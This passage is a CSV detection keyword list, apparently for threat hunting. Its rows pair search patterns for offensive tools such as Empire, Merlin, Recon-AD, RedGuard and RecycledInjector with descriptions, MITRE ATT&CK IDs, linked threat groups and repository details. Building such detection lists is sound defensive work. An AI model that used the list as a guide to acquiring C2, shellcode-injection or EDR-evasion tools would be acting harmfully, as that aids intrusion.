TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*Receive-AgentJob*",".{0,1000}Receive\-AgentJob.{0,1000}","offensive_tool_keyword","empire","empire function name of agent.ps1.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1054","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Received Mythic SOCKS task: *",".{0,1000}Received\sMythic\sSOCKS\stask\:\s.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" "*reciclador.cpp*",".{0,1000}reciclador\.cpp.{0,1000}","offensive_tool_keyword","mssqlproxy","mssqlproxy is a toolkit aimed to perform Lateral Movement in restricted environments through a compromised Microsoft SQL Server via socket reuse","T1021.002 - T1071.001 - T1573.002","TA0008 - TA0011","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/blackarrowsec/mssqlproxy","1","1","N/A","10","8","704","113","2021-02-16T20:13:04Z","2020-02-12T08:44:28Z" "*reciclador.dll*",".{0,1000}reciclador\.dll.{0,1000}","offensive_tool_keyword","mssqlproxy","mssqlproxy is a toolkit aimed to perform Lateral Movement in restricted environments through a compromised Microsoft SQL Server via socket reuse","T1021.002 - T1071.001 - T1573.002","TA0008 - TA0011","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/blackarrowsec/mssqlproxy","1","1","N/A","10","8","704","113","2021-02-16T20:13:04Z","2020-02-12T08:44:28Z" "*reciclador.vcxproj*",".{0,1000}reciclador\.vcxproj.{0,1000}","offensive_tool_keyword","mssqlproxy","mssqlproxy is a toolkit aimed to perform Lateral Movement in restricted environments through a compromised Microsoft SQL Server via socket reuse","T1021.002 - T1071.001 - T1573.002","TA0008 - TA0011","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/blackarrowsec/mssqlproxy","1","1","N/A","10","8","704","113","2021-02-16T20:13:04Z","2020-02-12T08:44:28Z" "*recon_passive.rb*",".{0,1000}recon_passive\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*Recon-AD-*.dll*",".{0,1000}Recon\-AD\-.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","Recon-AD an AD recon tool based on ADSI and reflective DLL s","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Recon-AD","1","1","N/A","10","3","298","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" "*Recon-AD-*.sln*",".{0,1000}Recon\-AD\-.{0,1000}\.sln.{0,1000}","offensive_tool_keyword","cobaltstrike","Recon-AD an AD recon tool based on ADSI and reflective DLL s","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Recon-AD","1","1","N/A","10","3","298","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" "*Recon-AD-*.vcxproj*",".{0,1000}Recon\-AD\-.{0,1000}\.vcxproj.{0,1000}","offensive_tool_keyword","cobaltstrike","Recon-AD an AD recon tool based on ADSI and reflective DLL s","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Recon-AD","1","1","N/A","10","3","298","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" "*Recon-AD-AllLocalGroups*",".{0,1000}Recon\-AD\-AllLocalGroups.{0,1000}","offensive_tool_keyword","cobaltstrike","Recon-AD an AD recon tool based on ADSI and reflective DLL s","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Recon-AD","1","1","N/A","10","3","298","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" "*Recon-AD-Computers All*",".{0,1000}Recon\-AD\-Computers\sAll.{0,1000}","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","0","N/A","8","3","298","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" "*Recon-AD-Domain*",".{0,1000}Recon\-AD\-Domain.{0,1000}","offensive_tool_keyword","cobaltstrike","Recon-AD an AD recon tool based on ADSI and reflective DLL s","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Recon-AD","1","1","N/A","10","3","298","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" "*Recon-AD-Groups All*",".{0,1000}Recon\-AD\-Groups\sAll.{0,1000}","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","0","N/A","8","3","298","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" "*Recon-AD-LocalGroups*",".{0,1000}Recon\-AD\-LocalGroups.{0,1000}","offensive_tool_keyword","cobaltstrike","Recon-AD an AD recon tool based on ADSI and reflective DLL s","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Recon-AD","1","1","N/A","10","3","298","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" "*Recon-AD-SPNs*",".{0,1000}Recon\-AD\-SPNs.{0,1000}","offensive_tool_keyword","cobaltstrike","Recon-AD an AD recon tool based on ADSI and reflective DLL s","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Recon-AD","1","1","N/A","10","3","298","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" "*Recon-AD-Users All*",".{0,1000}Recon\-AD\-Users\sAll.{0,1000}","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","0","N/A","8","3","298","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" "*Recon-AD-Users.*",".{0,1000}Recon\-AD\-Users\..{0,1000}","offensive_tool_keyword","cobaltstrike","Recon-AD an AD recon tool based on ADSI and reflective DLL s","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Recon-AD","1","1","N/A","10","3","298","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" "*recon-archy analyse*",".{0,1000}recon\-archy\sanalyse.{0,1000}","offensive_tool_keyword","recon-archy","Linkedin Tools to reconstruct a company hierarchy from scraping relations and jobs title","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/recon-archy","1","0","N/A","7","1","15","1","2020-08-04T11:26:42Z","2020-06-25T14:38:51Z" "*recon-archy build*",".{0,1000}recon\-archy\sbuild.{0,1000}","offensive_tool_keyword","recon-archy","Linkedin Tools to reconstruct a company hierarchy from scraping relations and jobs title","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/recon-archy","1","0","N/A","7","1","15","1","2020-08-04T11:26:42Z","2020-06-25T14:38:51Z" "*recon-archy crawl*",".{0,1000}recon\-archy\scrawl.{0,1000}","offensive_tool_keyword","recon-archy","Linkedin Tools to reconstruct a company hierarchy from scraping relations and jobs title","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/recon-archy","1","0","N/A","7","1","15","1","2020-08-04T11:26:42Z","2020-06-25T14:38:51Z" "*recon-archy-master*",".{0,1000}recon\-archy\-master.{0,1000}","offensive_tool_keyword","recon-archy","Linkedin Tools to reconstruct a company hierarchy from scraping relations and jobs title","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/recon-archy","1","0","N/A","7","1","15","1","2020-08-04T11:26:42Z","2020-06-25T14:38:51Z" "*ReconUserGroupRoles.ps1*",".{0,1000}ReconUserGroupRoles\.ps1.{0,1000}","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","8","4","333","52","2024-04-04T22:56:00Z","2023-02-09T02:08:07Z" "*RecycledInjector.exe*",".{0,1000}RecycledInjector\.exe.{0,1000}","offensive_tool_keyword","RecycledInjector","Native Syscalls Shellcode Injector","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/florylsk/RecycledInjector","1","1","N/A","N/A","3","260","42","2023-07-02T11:04:28Z","2023-06-23T16:14:56Z" "*RecycledInjector-main*",".{0,1000}RecycledInjector\-main.{0,1000}","offensive_tool_keyword","RecycledInjector","Native Syscalls Shellcode Injector","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/florylsk/RecycledInjector","1","1","N/A","N/A","3","260","42","2023-07-02T11:04:28Z","2023-06-23T16:14:56Z" "*RecycledInjector-main*",".{0,1000}RecycledInjector\-main.{0,1000}","offensive_tool_keyword","RecycledInjector","Native Syscalls Shellcode Injector","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/florylsk/RecycledInjector","1","1","N/A","N/A","3","260","42","2023-07-02T11:04:28Z","2023-06-23T16:14:56Z" "*RED_HAWK*",".{0,1000}RED_HAWK.{0,1000}","offensive_tool_keyword","red_hawk","Vulnerability Scanning and Crawling. A must have tool for all penetration testers.","T1190 - T1059 - T1595","TA0001 - TA0009","N/A","N/A","Information Gathering","https://github.com/Tuhinshubhra/RED_HAWK","1","0","N/A","N/A","10","2823","820","2022-05-31T12:08:19Z","2017-06-11T05:02:35Z" "*Red-Baron*",".{0,1000}Red\-Baron.{0,1000}","offensive_tool_keyword","Red-Baron","Red Baron is a set of modules and custom/third-party providers for Terraform which tries to automate creating resilient. disposable. secure and agile infrastructure for Red Teams.","T1583 - T1078 - T1027 - T1135","TA0002 - TA0003 - TA0040","N/A","N/A","Frameworks","https://github.com/byt3bl33d3r/Red-Baron","1","0","N/A","N/A","4","366","74","2020-03-05T07:19:43Z","2018-08-23T18:25:07Z" "*RedByte1337/GraphSpy*",".{0,1000}RedByte1337\/GraphSpy.{0,1000}","offensive_tool_keyword","GraphSpy","Initial Access and Post-Exploitation Tool for AAD and O365 with a browser-based GUI","T1190 - T1133 - T1071 - T1082 - T1566.002","TA0001 - TA0006 - TA0007","N/A","N/A","Discovery","https://github.com/RedByte1337/GraphSpy","1","1","N/A","7","4","346","39","2024-04-17T19:18:08Z","2024-02-07T19:47:15Z" "*redelk_backend_name_c2*",".{0,1000}redelk_backend_name_c2.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","861","136","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" "*redelk_backend_name_decoy*",".{0,1000}redelk_backend_name_decoy.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","861","136","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" "*RedGuard.log*",".{0,1000}RedGuard\.log.{0,1000}","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/wikiZ/RedGuard","1","1","N/A","10","10","1223","180","2023-09-19T11:06:40Z","2022-05-08T04:02:33Z" "*RedGuard/core*",".{0,1000}RedGuard\/core.{0,1000}","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/wikiZ/RedGuard","1","0","N/A","10","10","1223","180","2023-09-19T11:06:40Z","2022-05-08T04:02:33Z" "*RedGuard_x64.exe*",".{0,1000}RedGuard_x64\.exe.{0,1000}","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/wikiZ/RedGuard","1","1","N/A","10","10","1223","180","2023-09-19T11:06:40Z","2022-05-08T04:02:33Z" 